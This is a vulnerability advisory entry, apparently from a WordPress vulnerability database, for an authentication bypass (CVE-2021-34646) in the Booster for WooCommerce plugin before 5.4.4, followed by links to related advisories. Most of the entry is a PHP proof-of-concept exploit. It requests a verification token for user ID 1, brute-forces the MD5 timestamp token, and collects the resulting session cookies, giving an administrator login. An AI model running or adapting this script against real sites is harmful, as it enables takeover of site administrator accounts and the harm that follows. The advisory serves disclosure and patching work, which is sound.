Lucene search
Chloe ChamberlandWPEX-ID:B5795F8A-78B8-481E-8522-7BD4689C917CHistoryAug 24, 2021 - 12:00 a.m.
Booster for WooCommerce < 5.4.4 - Authentication Bypass
2021-08-2400:00:00
Chloe Chamberland
131
0.032 Low
EPSS
Percentile
91.2%
Versions up to, and including, 5.4.3, of the Booster for WooCommerce WordPress plugin are vulnerable to authentication bypass via the process_email_verification function due to a random token generation weakness in the reset_and_mail_activation_link function found in the ~/includes/class-wcj-emails-verification.php file. This allows attackers to impersonate users and trigger an email address verification for arbitrary accounts, including administrative accounts, and automatically be logged in as that user, including any site administrators. This requires the Email Verification module to be active in the plugin and the Login User After Successful Verification setting to be enabled, which is by default.
<?php
// Settings
$wp_url = $argv[1];
$starttime = time();
// Initiate the token
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/?wcj_user_id=1');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);
$endtime = time();
//Loop through to get the right time.
foreach (range($starttime, $endtime) as $number) {
//Json Encode Our Goods
$data2 = array(
"id" => "1",
"code" => md5($number));
$postdata1 = base64_encode(json_encode($data2));
echo $postdata1;
//Create New Post
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '?wcj_verify_email=' . $postdata1);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST");
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);
curl_setopt($ch, CURLOPT_HEADER, 1);
$output = curl_exec($ch);
curl_close($ch);
preg_match_all('/^Set-Cookie:\s*([^;]*)/mi', $output, $matches);
$cookies = array();
foreach($matches[1] as $item) {
parse_str($item, $cookie);
$cookies = array_merge($cookies, $cookie);
}
var_dump($cookies);
}
?>Related
patchstack
patchstack
wpvulndb
wpvulndb
Booster for WooCommerce < 5.4.4 - Authentication Bypass
2021-08-24 00:00:00
nvd
nvd
CVE-2021-34646
2021-08-30 19:15:08
githubexploit
githubexploit
packetstorm
packetstorm
WordPress WooCommerce Booster 5.4.3 Authentication Bypass
2021-09-17 00:00:00
prion
prion
Authentication flaw
2021-08-30 19:15:00
wordfence
wordfence
cve
cve
CVE-2021-34646
2021-08-30 19:15:08
zdt
zdt
WordPress WooCommerce Booster Plugin 5.4.3 - Authentication Bypass Exploit
2021-09-17 00:00:00
cvelist
cvelist
CVE-2021-34646 Booster for WooCommerce <= 5.4.3 Authentication Bypass
2021-08-24 00:00:00
exploitdb
exploitdb
WordPress Plugin WooCommerce Booster Plugin 5.4.3 - Authentication Bypass
2021-09-17 00:00:00